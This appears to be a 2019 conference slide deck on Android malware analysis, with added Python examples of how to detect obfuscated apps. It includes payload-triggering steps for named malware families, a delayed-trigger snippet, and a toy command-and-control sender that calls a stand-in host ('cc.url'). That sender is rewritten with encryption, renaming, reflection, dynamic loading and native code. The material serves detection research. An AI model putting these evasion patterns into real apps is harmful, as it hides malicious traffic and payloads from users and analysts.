Introduction Malware examples Malware analysis Obfuscation Results
Obfuscated Android Application Development
Jean-François Lalande, Pierre Graux, Valérie Viet Triem Tong
CECC 2019
November 14th 2019
Android malware analysis
- Static analysis: (byte)code parsing + CFG analysis
- Dynamic analysis: execution (smartphone, cuckoo sandbox)
Research goals:
- malware detection, classification
- flow recovering, data tainting
- payload triggering, unpacking
[Figure credit: by Con-struct + replicant community, CC BY-SA 3.0]
Research papers
Research papers usually do:
1. Algorithm design, e.g. malware detection
2. Pick or build a dataset
3. Evaluation: pick a sample and run!
Building a dataset is difficult!
Where to find these samples? Are they representative? ...
Evaluating is difficult!
You may suffer crashes, operating system corruption...
What about "difficult" malware? Do we have them in the dataset? Triggering conditions? Obfuscated?
Example: Remote Admin Tools
Install malicious apps:
- Badnews: obeys a remote server + delays the attack. Triggering: patch the bytecode + build a fake server
- DroidKungFu1 (well known): delays the attack. Triggering: modify 'start' to 1 in sstimestamp.xml and reboot the device
Example: Blocker / Eraser
Wipes the SD card and blocks social apps:
- WipeLocker: delayed attack. Triggering: launch the app and reboot the device
Example: Adware
Displays ads after some days:
- MobiDash: delayed attack. Triggering: launch the application, reboot the device and modify com.cardgame.durak_preferences.xml
Example: Spyware
Steals contacts, SMS, IMEI, ...
- SaveMe: verifies the Internet access. Triggering: enable Internet access and launch the app
- Cajino: obeys a Baidu remote server. Triggering: simulate a server command with an Intent
Ransomware
Encrypts the user's files and asks for payment:
- SimpleLocker: waits for the device to reboot. Triggering: send a BOOT_COMPLETED intent
Our analysis framework: GroddDroid*
[Figure: GroddDroid pipeline]
  APK -> Static Analysis (CFG, payload location, API usage, etc.)
      -> Control Flow Tracer (targeting one payload) -> New APK
  GroddDroid Runner (on a real smartphone) controls:
      - Reference Execution of the original APK
      - Execution with Branch Forcing of the New APK (GroddDroid forces the control flow)
  Log Collector -> Malicious Code Triggering Coverage, Code Coverage
* Abraham et al. 2015, Leslous et al. 2017
GroddDroid output example: simplelocker
Triggering conditions?
    long installed = getPackageManager()
        .getPackageInfo("jf.andro.malcon15demo2", 0)
        .firstInstallTime;
    SimpleDateFormat sdf = new SimpleDateFormat("yyyy");
    int yearInstalled = Integer.parseInt(sdf.format(installed));

    // We trigger the malicious code next year!
    // (currentYear: the current year, computed elsewhere in the app)
    if (currentYear > yearInstalled)
    {
        // payload
    }
Listing 1: Example of triggering condition
So, all problems are solved?
Datasets: you don't really know what you have in datasets.
Dynamic analysis: you have to help malware execute itself.
Static analysis: obfuscation can prevent you from:
- analyzing or building your dataset
- driving your dynamic analysis
⇒ we have the feeling that obfuscation use is increasing...
Studying obfuscation
Objectives:
- Explain how to build obfuscated applications
- Propose detection algorithms
- Measure obfuscation usage in the wild
Contributions:
- Explain how to build obfuscated applications
- Detection algorithms are difficult to design
- We can only measure the usage of programming techniques
Running example: connecting to a CC server
    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) {
            DatagramPacket dp = new DatagramPacket(buf, length,
                InetAddress.getByName(this.url),
                this.port);
            new DatagramSocket().send(dp);
        }
    }
Listing 2: Unobfuscated malicious code
String encryption
    class AES256 {
        static public String aes256(String str) {
            String key = "<<key>>"; ... }
    }
    class CommandAndControl {
        public String url = "<<ciphered url>>"; // "cc.url"
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) {
            DatagramPacket dp = new DatagramPacket(buf, length,
                InetAddress.getByName(AES256.aes256(this.url)),
                this.port);
            new DatagramSocket().send(dp);
        }
    }
Listing 3: String encrypted version
Running example: identifier renaming
    class ____ {
        public String ____ = "cc.url";
        public int ___ = 4242;
        public void ________(byte[] __, int _____) {
            DatagramPacket _______ = new DatagramPacket(__,
                _____,
                InetAddress.getByName(this.____),
                this.___);
            new DatagramSocket().send(_______);
        }
    }
Listing 4: Identifier renaming version
Running example: reflection
    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) {
            // Method names are assembled at runtime, so "getByName" and
            // "send" never appear as whole constant strings
            InetAddress addr = (InetAddress) InetAddress.class
                .getDeclaredMethod("get" + "ByName", String.class)
                .invoke(null, this.url);
            DatagramPacket dp = new DatagramPacket(buf, length,
                addr, this.port);
            DatagramSocket.class.getDeclaredMethod("s" + "end",
                DatagramPacket.class)
                .invoke(new DatagramSocket(), dp);
        }
    }
Listing 5: Reflection version
Running example: dynamic code loading
    void invokeDynamically() {
        /* Loads the implementation of C&C from a dex file
           (file: the dex file to load, defined elsewhere) */
        PathClassLoader pcl =
            new PathClassLoader(file.getPath(), null);
        Class<?> clazz = pcl.loadClass("CommandAndControl");
        Log.i("CL", "Loaded class from dex: " + clazz);
        Constructor<?> c = clazz.getConstructor();
        Object o = c.newInstance();
        Method m = clazz.getMethod("send",
            byte[].class, int.class);
        m.invoke(o, ...); // CommandAndControl.send(....)
    }
Listing 6: Dynamic code loading version
Running example: native methods
    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        native public void sendCommand(byte[] buf, int length);
    }

    extern "C" JNIEXPORT void JNICALL
    Java_CommandAndControl_sendCommand(JNIEnv* env,
            jobject thisPtr, jbyteArray buf, jint length) {

        jbyte* bufData = env->GetByteArrayElements(buf, NULL);
        jint port = env->GetIntField(thisPtr,
            env->GetFieldID(env->GetObjectClass(thisPtr),
                "port", "I"));

        /* Use libc functions to send the packet */
    }
Listing 7: Native version
Running example: packer
Unpacker:
- Unpack routine: unpack the bytecode of the application
- Load and run this new bytecode
Detecting obfuscation?
Is obfuscation used in the wild? Can we design a detection technique for obfuscated apps?
  APK --obfuscation--> APK'
Goal:
- classify APK as non obfuscated
- classify APK' as obfuscated
Detection techniques
Detecting techniques for obfuscation purpose?
Table: Overview of our analysis methods
  Development technique  | Analysis method | Detection
  String encryption      | usage ratio     | yes (threshold)
  Identifier renaming    | usage ratio     | yes (threshold)
  Reflection             | use             | no
  Dynamic code loading   | use             | no
  Native method          | use             | no
  Packer                 | artifacts       | yes
Strings encryption
[Figure: detection pipeline]
  APK -extract-> constant strings -compute-> entropy e
  Count the n strings such that e > T
Decision threshold: choose n = 1, 10, 100
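The entropy test sketched on this slide, written out as an added example (not code from the slides or from the authors' tooling): the Shannon entropy of each constant string is computed, the strings whose entropy exceeds the threshold T are counted, and the APK is flagged when at least n of them exist. The string lists are constructed here to stand in for the output of a dex string-pool extractor, and the default T = 4.4 and n values are placeholders chosen to match the slide's plot, not values the authors state.

```python
import math
from collections import Counter

# Constructed sample of constant strings, as if extracted from an APK's string
# pool (the dex parsing step itself is not shown here).
PLAIN_STRINGS = ["cc.url", "Loaded class from dex: ", "yyyy", "port", "I"]
CIPHERED_STRINGS = [
    # Constructed stand-ins for encrypted/encoded string constants
    "kX9zQ2vT7mR4bN1wP8yL3cF6hJ0aD5eG",
    "Zq83LmNv1TxPb7RwYk2sHd9fGj4cVe6n",
    "u7Ht2Lq9Xz0Kc4Pm8Vs1Bw3Ny5Gf6Rd",
]


def shannon_entropy(s: str) -> float:
    """Shannon entropy of s in bits per character (0.0 for the empty string).

    Note that a string of length L can never exceed log2(L) bits, so short
    identifiers such as "port" or "I" cannot cross a threshold like 4.4
    whatever their content: the test only reacts to long, random-looking data.
    """
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def count_high_entropy(strings, threshold: float) -> int:
    """n on the slide: the number of constant strings with entropy e > T."""
    return sum(1 for s in strings if shannon_entropy(s) > threshold)


def is_string_encrypted(strings, threshold: float = 4.4, n: int = 10) -> bool:
    """Decision rule of the slide: flag the APK if at least n strings have e > T.

    T and n are placeholders here; the slide evaluates n = 1, 10, 100.
    """
    return count_high_entropy(strings, threshold) >= n
```

Running both lists through the rule shows why n matters: the plain strings never reach T, while the three ciphered strings trip the detector for n = 1 but not for n = 10. A single high-entropy constant is common in legitimate apps (an embedded key, a hash, a base64 asset), which is why the slide treats n as a tuning parameter rather than a fixed value.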
Identifier renaming
[Figure: detection pipeline]
  APK -extract-> NB identifiers -size filtering-> Matching against a word dictionary -> n matches
  Ratio j = n / NB
Examples:
    private Integer my_variable; // Original
    private String zwf_fwz;      // Renamed
    private String u;            // Too short: cannot conclude
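The dictionary-matching pipeline of this slide, as an added example that is not part of the original deck: identifiers are size-filtered (the slide's "u" is too short to conclude anything), split into snake_case and camelCase tokens, matched against a word dictionary, and the ratio j = n / NB is computed. The minimum length of 3, the tiny word dictionary, the rule "an identifier matches if any of its tokens is a dictionary word", and the decision "renamed if j is below the threshold" are all assumptions made for this example; the authors do not state them on the slide.

```python
import re

# Constructed word dictionary; a real run would use a full English word list
# plus common programming vocabulary.
WORD_DICTIONARY = {
    "my", "variable", "send", "command", "url", "port", "buffer", "length",
    "get", "install", "year", "time", "packet", "socket", "address", "data",
}

# Identifiers shorter than this are dropped before computing NB: the slide
# says a name like "u" is too short to conclude. The cutoff is an assumption.
MIN_IDENTIFIER_LENGTH = 3

# Constructed identifier sets, as if extracted from the Listing 2 and Listing 4 APKs.
ORIGINAL_IDENTIFIERS = ["my_variable", "sendCommand", "url", "port", "buf",
                        "length", "getInstallYear", "u"]
RENAMED_IDENTIFIERS = ["zwf_fwz", "qpx", "____", "a1b2", "kjh",
                       "mvq_ttr", "xzyw", "u"]

# camelCase words, all-caps acronyms, and digit runs
_TOKEN_RE = re.compile(r"[A-Z]?[a-z]+|[A-Z]+(?![a-z])|\d+")


def tokenize(identifier: str):
    """Split snake_case and camelCase identifiers into lower-case tokens."""
    return [t.lower() for part in identifier.split("_") for t in _TOKEN_RE.findall(part)]


def matches_dictionary(identifier: str) -> bool:
    """An identifier 'matches' when at least one of its tokens is a known word."""
    return any(t in WORD_DICTIONARY for t in tokenize(identifier))


def renaming_ratio(identifiers):
    """Return (n, NB, j): NB identifiers kept after size filtering, n of them
    matching the dictionary, and the ratio j = n / NB from the slide."""
    kept = [i for i in identifiers if len(i) >= MIN_IDENTIFIER_LENGTH]
    nb = len(kept)
    n = sum(1 for i in kept if matches_dictionary(i))
    j = n / nb if nb else 0.0
    return n, nb, j


def is_identifier_renamed(identifiers, threshold: float = 0.5) -> bool:
    """Flag the APK as renamed when the matching ratio j falls below the
    threshold (the x axis of the slide's plot). The 0.5 default is a placeholder."""
    _, nb, j = renaming_ratio(identifiers)
    return nb > 0 and j < threshold
```

On the constructed sets, the Listing 2 style names give j = 6/7 (only "buf" fails, because the dictionary holds "buffer" and not the abbreviation), while the Listing 4 style names give j = 0. Real apps sit in between: minified third-party libraries lower j in perfectly legitimate APKs, which is the trade-off the ratio-threshold plot later in the deck is measuring.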
Other techniques
- Reflection: java.lang.reflect
- Dynamic code loading: DexFile, PathClassLoader
- Native methods: private native void f()
- Packers: artifact detection with Apkid
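The "use" detection for reflection, dynamic code loading and native methods from the table above and from this slide, as an added example (not the authors' code): each app's disassembly is scanned for the java.lang.reflect descriptors, the DexFile / PathClassLoader class references, and method declarations carrying the native flag, and the results are aggregated into per-technique counts and percentages in the shape of the results table later in the deck. The smali snippets are constructed, the DexClassLoader marker is added on my own knowledge of Android, and packer detection is left out because the slide delegates it to Apkid.

```python
import re

# Class descriptors whose presence marks the technique as "used" in an APK.
REFLECTION_MARKERS = ("Ljava/lang/reflect/",)
DCL_MARKERS = (
    "Ldalvik/system/DexFile;",
    "Ldalvik/system/PathClassLoader;",
    "Ldalvik/system/DexClassLoader;",   # not on the slide; added from Android's API
)
# A smali method declaration with the native access flag, e.g.
#   .method public native sendCommand([BI)V
NATIVE_METHOD_RE = re.compile(r"^\s*\.method\b.*\bnative\b", re.MULTILINE)

# Constructed smali fragments standing in for three disassembled APKs.
APP_PLAIN = """\
.class public LCommandAndControl;
.method public sendCommand([BI)V
    invoke-static {v0}, Ljava/net/InetAddress;->getByName(Ljava/lang/String;)Ljava/net/InetAddress;
.end method
"""
APP_REFLECTION = """\
.class public LCommandAndControl;
.method public sendCommand([BI)V
    invoke-virtual {v0, v1, v2}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
    invoke-virtual {v3, v4, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
.end method
"""
APP_DCL_NATIVE = """\
.class public LLoader;
.method public native sendCommand([BI)V
.end method
.method public invokeDynamically()V
    new-instance v0, Ldalvik/system/PathClassLoader;
.end method
"""
SAMPLE_DATASET = [APP_PLAIN, APP_REFLECTION, APP_DCL_NATIVE, APP_PLAIN]


def detect_techniques(smali: str) -> dict:
    """Per-APK 'use' flags for the three techniques the table marks as 'use'."""
    return {
        "reflection": any(m in smali for m in REFLECTION_MARKERS),
        "dcl": any(m in smali for m in DCL_MARKERS),
        "native": NATIVE_METHOD_RE.search(smali) is not None,
    }


def summarize(dataset) -> dict:
    """Counts and percentages of apps using each technique, in the shape of
    the deck's results table (count, percentage of the dataset)."""
    total = len(dataset)
    counts = {"reflection": 0, "dcl": 0, "native": 0}
    for smali in dataset:
        for technique, used in detect_techniques(smali).items():
            counts[technique] += int(used)
    return {k: (c, round(100.0 * c / total, 2) if total else 0.0) for k, c in counts.items()}
```

The scan only establishes that a technique is present, which is exactly why the table marks these three rows as "no" for detection: the Android framework, dependency-injection and JSON libraries all use reflection and class loaders legitimately, so a presence flag alone cannot separate an obfuscated APK from a normal one.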
Datasets
- AMD Dataset (Wei et al. [4]): 24,552 samples, 10-16
- Drebin (Arp et al. [2]): 5,560 samples, 08-12
- GoodMal19 (Viet Triem Tong et al. [3]): 10,000 samples, 15-18
- Androzoo (Allix et al. [1]): 9,041 samples, 08-18
Obfuscation detection
  Dataset    | Total | Packer       | Native        | DCL            | Reflection
  GOOD [3]   | 4999  | 3 (0.06%)    | 1266 (25.58%) | 4544 (91.82%)  | 4735 (95.68%)
  MAL [3]    | 4991  | 542 (10.86%) | 2378 (57.62%) | 3730 (90.38%)  | 3893 (94.33%)
  AMD [4]    | 24552 | 31 (0.13%)   | 5206 (21.52%) | 15267 (63.12%) | 19184 (79.31%)
  Drebin [2] | 5560  | 0 (0%)       | 1051 (19.07%) | 1449 (26.29%)  | 3066 (55.62%)
Identifier renaming
[Figure: detection rate (%) against the ratio threshold (0.3 to 1.0), one curve per dataset: GOOD, MAL, AMD, Drebin]
Entropy for GOOD Dataset
[Figure: detection ratio (%) against the entropy threshold (0.0 to 5.0, with 4.4 and 4.6 marked), one curve per n = 1, n = 10, n = 100]
Conclusion and future works
Obfuscation:
- usage increases
- difficult to distinguish from legitimate use
Future works:
- Analysis of native applications
- Dataset building and use
- PyMaO: an open source software for orchestrating experiments
References
[1] Kevin Allix, Tegawendé F. Bissyandé, Jacques Klein, and Yves Le Traon. Androzoo: Collecting millions of Android apps for the research community. In 13th International Conference on Mining Software Repositories, MSR '16, pages 468–471, New York, NY, USA, 2016. ACM.
[2] Daniel Arp, Michael Spreitzenbarth, Malte Hubner, Hugo Gascon, Konrad Rieck, and CERT Siemens. Drebin: Effective and explainable detection of Android malware in your pocket. In 21st Annual Network and Distributed System Security Symposium, volume 14, pages 23–26, San Diego, CA, USA, 2014.
[3] V. Viet Triem Tong, C. Herzog, T. Concepción Miranda, P. Graux, J.-F. Lalande, and P. Wilke. Isolating malicious code in Android malware in the wild. In 14th International Conference on Malicious and Unwanted Software, Nantucket, MA, USA, 2019. IEEE Computer Society.
[4] Fengguo Wei, Yuping Li, Sankardas Roy, Xinming Ou, and Wu Zhou. Deep ground truth analysis of current Android malware. In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, pages 252–276. Springer, 2017.